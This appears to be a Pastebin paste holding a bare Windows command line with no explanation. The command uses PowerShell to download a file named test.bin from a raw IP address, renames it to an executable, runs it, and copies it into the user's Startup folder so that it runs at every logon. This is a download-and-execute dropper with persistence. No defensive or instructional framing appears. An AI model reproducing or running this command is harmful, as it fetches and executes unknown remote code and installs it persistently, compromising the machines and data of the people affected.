Advertisement
Guest User

Untitled

a guest
Oct 14th, 2019
74
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. cd c:\
  2. cmd.exe /c cd %TEMP% | powershell -Command "(New-Object Net.WebClient).DownloadFile('http://157.245.120.60/test.bin', 'test.bin')" | rename test.bin test.exe | start test.exe | copy test.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\test.exe" | dir
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement